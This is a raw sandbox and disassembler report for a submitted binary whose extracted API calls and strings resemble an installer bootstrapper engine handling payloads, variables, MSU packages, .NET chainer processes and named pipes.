                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateCompareProcessString
                                                                                                                                                                                                                                                                                                  • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1171520630-3127305756
                                                                                                                                                                                                                                                                                                  • Opcode ID: ae6b4be02ea49251b6cb371386f14ea0f0b5f6b2ac8533a7b72c8ee9ef70a949
                                                                                                                                                                                                                                                                                                  • Instruction ID: 770c21faf8355bef90df0f163219e641b5a2e4a0a5c14124464e9cfcacc2847f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae6b4be02ea49251b6cb371386f14ea0f0b5f6b2ac8533a7b72c8ee9ef70a949
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1C1E671E4072AFBDB219A94CC42FADB664FF06720F120161FA21F7691C7B5EE109791
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00865445,?,00000000,80070490,?,?,?,?,?,?,?,?,0088C1BF,?,00865445,?), ref: 008684A7
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00865445,?,?,?,?,?,?,?,?,0088C1BF,?,00865445,?,00865445,00865445,Chain), ref: 00868804
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get @Hidden., xrefs: 008687E8
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 008687B9
                                                                                                                                                                                                                                                                                                  • Failed to get @Persisted., xrefs: 008687E1
                                                                                                                                                                                                                                                                                                  • Failed to change variant type., xrefs: 008687DA
                                                                                                                                                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 008687C8
                                                                                                                                                                                                                                                                                                  • Failed to get @Type., xrefs: 00868788
                                                                                                                                                                                                                                                                                                  • Value, xrefs: 00868565
                                                                                                                                                                                                                                                                                                  • Type, xrefs: 008685A3
                                                                                                                                                                                                                                                                                                  • Persisted, xrefs: 0086854A
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 0086878F
                                                                                                                                                                                                                                                                                                  • Initializing hidden variable '%ls', xrefs: 00868671
                                                                                                                                                                                                                                                                                                  • Failed to get next node., xrefs: 008687F6
                                                                                                                                                                                                                                                                                                  • Failed to get variable node count., xrefs: 008684E1
                                                                                                                                                                                                                                                                                                  • Failed to get @Value., xrefs: 00868796
                                                                                                                                                                                                                                                                                                  • version, xrefs: 0086862C
                                                                                                                                                                                                                                                                                                  • Initializing string variable '%ls' to value '%ls', xrefs: 0086861A
                                                                                                                                                                                                                                                                                                  • Initializing numeric variable '%ls' to value '%ls', xrefs: 008685E2
                                                                                                                                                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 008687A7
                                                                                                                                                                                                                                                                                                  • Failed to set variant encryption, xrefs: 0086879D
                                                                                                                                                                                                                                                                                                  • Variable, xrefs: 008684B1
                                                                                                                                                                                                                                                                                                  • numeric, xrefs: 008685BC
                                                                                                                                                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 008687D2
                                                                                                                                                                                                                                                                                                  • Hidden, xrefs: 0086852F
                                                                                                                                                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 008686C6
                                                                                                                                                                                                                                                                                                  • Failed to get @Id., xrefs: 008687EF
                                                                                                                                                                                                                                                                                                  • string, xrefs: 008685F7
                                                                                                                                                                                                                                                                                                  • Initializing version variable '%ls' to value '%ls', xrefs: 00868653
                                                                                                                                                                                                                                                                                                  • Failed to select variable nodes., xrefs: 008684C4
                                                                                                                                                                                                                                                                                                  • Invalid value for @Type: %ls, xrefs: 00868778
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-1614826165
                                                                                                                                                                                                                                                                                                  • Opcode ID: 71d3df8d045bbcf2ccae8a7e54e0c23dcabee834a44dd70bc2f5fd0597a40e53
                                                                                                                                                                                                                                                                                                  • Instruction ID: e6e65c15091dfb334bddf9abac4683d323b66b924e5d2e13d6c18eb18f1a4482
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71d3df8d045bbcf2ccae8a7e54e0c23dcabee834a44dd70bc2f5fd0597a40e53
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB1B172D40229FBDB119B98CC45EAEBBB4FF05720F220355F518F6690CB759A40DB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0087BDDC,00000007,?,?,?), ref: 00886D20
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00865EB2,00000000), ref: 008A0AE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetProcAddress.KERNEL32(00000000), ref: 008A0AE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0ACC: GetLastError.KERNEL32(?,?,?,00865EB2,00000000), ref: 008A0AFE
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 0088710F
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00887123
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to find Windows directory., xrefs: 00886D5F
                                                                                                                                                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 00886DFC
                                                                                                                                                                                                                                                                                                  • "%ls" "%ls" /quiet /norestart, xrefs: 00886E48
                                                                                                                                                                                                                                                                                                  • Failed to determine WOW64 status., xrefs: 00886D32
                                                                                                                                                                                                                                                                                                  • Failed to ensure WU service was enabled to install MSU package., xrefs: 00886F2E
                                                                                                                                                                                                                                                                                                  • D, xrefs: 00886F3B
                                                                                                                                                                                                                                                                                                  • Failed to append log switch to MSU command-line., xrefs: 00886EB6
                                                                                                                                                                                                                                                                                                  • Failed to format MSU install command., xrefs: 00886E5C
                                                                                                                                                                                                                                                                                                  • Failed to build MSU path., xrefs: 00886E35
                                                                                                                                                                                                                                                                                                  • Bootstrapper application aborted during MSU progress., xrefs: 00887054
                                                                                                                                                                                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 0088709E
                                                                                                                                                                                                                                                                                                  • Failed to get action arguments for MSU package., xrefs: 00886DD6
                                                                                                                                                                                                                                                                                                  • /log:, xrefs: 00886EA2
                                                                                                                                                                                                                                                                                                  • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00886E75
                                                                                                                                                                                                                                                                                                  • Failed to get process exit code., xrefs: 0088702C
                                                                                                                                                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 00886E0B, 0088713B
                                                                                                                                                                                                                                                                                                  • 2, xrefs: 00886FB3
                                                                                                                                                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 00886F9A
                                                                                                                                                                                                                                                                                                  • Failed to format MSU uninstall command., xrefs: 00886E89
                                                                                                                                                                                                                                                                                                  • msuengine.cpp, xrefs: 00886F8D, 00887022, 0088704A
                                                                                                                                                                                                                                                                                                  • SysNative\, xrefs: 00886D6A
                                                                                                                                                                                                                                                                                                  • Failed to append SysNative directory., xrefs: 00886D7D
                                                                                                                                                                                                                                                                                                  • Failed to append log path to MSU command-line., xrefs: 00886ED4
                                                                                                                                                                                                                                                                                                  • Failed to find System32 directory., xrefs: 00886D95
                                                                                                                                                                                                                                                                                                  • wusa.exe, xrefs: 00886DA0
                                                                                                                                                                                                                                                                                                  • Failed to allocate WUSA.exe path., xrefs: 00886DB3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 1400713077-4261965642
                                                                                                                                                                                                                                                                                                  • Opcode ID: 98ddd72d4d036e72b7fcb894cb99939258fbf3ee47eb4cb59a0c2ae386cb4b2e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 455bdf304a4dd4a2aaec814f8d455cb9a02ba7272ccea2d704fcbba46679890b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98ddd72d4d036e72b7fcb894cb99939258fbf3ee47eb4cb59a0c2ae386cb4b2e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D19071A4070ABAEB11AFA8CD85FEEBBB8FF18704F200025F610E6251E7B5D9509B51
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0088D4B3
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 0088D4DC
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 0088D5C5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0088D5CF
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0088D668
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(008AB500,000000FF,?,?,?,?), ref: 0088D673
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(008AB500,?,?,?,?), ref: 0088D69D
                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0088D6BE
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0088D6CC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0088D704
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: WaitForSingleObject.KERNEL32(?,000000FF,771B30B0,00000000,?,?,?,?,0088D642,?), ref: 0088D357
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: ReleaseMutex.KERNEL32(?,?,?,?,0088D642,?), ref: 0088D375
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088D3B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: ReleaseMutex.KERNEL32(?), ref: 0088D3CD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088D33E: SetEvent.KERNEL32(?), ref: 0088D3D6
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0088D7B9
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0088D7D1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to wait for netfx chainer process to complete, xrefs: 0088D732
                                                                                                                                                                                                                                                                                                  • %ls /pipe %ls, xrefs: 0088D57F
                                                                                                                                                                                                                                                                                                  • D, xrefs: 0088D5AA
                                                                                                                                                                                                                                                                                                  • Failed to allocate netfx chainer arguments., xrefs: 0088D593
                                                                                                                                                                                                                                                                                                  • Failed to allocate section name., xrefs: 0088D51D
                                                                                                                                                                                                                                                                                                  • Failed to create netfx chainer., xrefs: 0088D55E
                                                                                                                                                                                                                                                                                                  • NetFxChainer.cpp, xrefs: 0088D4F1, 0088D5F3, 0088D6F0, 0088D728
                                                                                                                                                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 0088D5FE
                                                                                                                                                                                                                                                                                                  • Failed to create netfx chainer guid., xrefs: 0088D4C0
                                                                                                                                                                                                                                                                                                  • Failed to convert netfx chainer guid into string., xrefs: 0088D4FB
                                                                                                                                                                                                                                                                                                  • Failed to process netfx chainer message., xrefs: 0088D648
                                                                                                                                                                                                                                                                                                  • Failed to get netfx return code., xrefs: 0088D6FA
                                                                                                                                                                                                                                                                                                  • Failed to allocate event name., xrefs: 0088D53F
                                                                                                                                                                                                                                                                                                  • NetFxSection.%ls, xrefs: 0088D509
                                                                                                                                                                                                                                                                                                  • NetFxEvent.%ls, xrefs: 0088D52B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                                                                                                                                                                                  • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1533322865-1825855094
                                                                                                                                                                                                                                                                                                  • Opcode ID: b8df5e07ee4e6d654e8c390cc7791c894ea459513768bc5a6d6534addc7936b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 33bf8a961cf235b6b768033d5488cad1db25028540b14027515679c512dadd49
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8df5e07ee4e6d654e8c390cc7791c894ea459513768bc5a6d6534addc7936b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05A16F72D40329ABEB21ABA8CC45B9EB7B8FB14710F114169E918FB292D7359D408F91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 008A755D
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7726
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A77C3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                                                                                                                                                                                  • String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                                                                                                                                                                                  • API String ID: 1555028553-2592408802
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6d30e5839275b6e2c3cd43491842f25b57118882e752c5953e55c6b3bf9b926d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d171f6d2229382e8c53d63b1cc47dcf903d3181921ed3852e470c7e0aa198b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d30e5839275b6e2c3cd43491842f25b57118882e752c5953e55c6b3bf9b926d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6B15E31948216BBEB119BA4CC41FAEB674FB06730F200365F521E6AD1E774EE50EB90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,008C3E78,000000FF,?,?,?), ref: 008A71D4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 008A71F9
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008A7219
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 008A7235
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 008A725D
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 008A7279
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 008A72B2
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 008A72EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A6D50: SysFreeString.OLEAUT32(00000000), ref: 008A6E89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A6D50: SysFreeString.OLEAUT32(00000000), ref: 008A6EC8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A736F
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A741F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                                                  • String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 318886736-4294603148
                                                                                                                                                                                                                                                                                                  • Opcode ID: a73e19704b630ed36b9be9dd47e8f152bcc6116a7b69738411a858e39e5cdd9b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8da66fc74538750d636a2ba46d0bd2956bf42e1205e0ff879e1c2ff8c24cbd6b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a73e19704b630ed36b9be9dd47e8f152bcc6116a7b69738411a858e39e5cdd9b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FA19031909216BBEF119B54CC41FAEBA74FB06730F204365F921E6AD1D774EA10EB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,008AB500,?,00000000,?,0086452F,?,008AB500), ref: 008754FD
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,0086452F,?,008AB500), ref: 00875508
                                                                                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0086452F,?,008AB500), ref: 0087553F
                                                                                                                                                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000,?,0086452F,?,008AB500), ref: 00875554
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087555E
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,0086452F,?,008AB500), ref: 00875593
                                                                                                                                                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0086452F,?,008AB500), ref: 008755B6
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 008755D1
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,0086452F,008AB500,00000000,00000000,?,0086452F,?,008AB500), ref: 008755EC
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 00875607
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 00875622
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087567D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 008756B1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 008756E5
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 00875719
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087574A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087577B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A45A
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A480
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0086A768
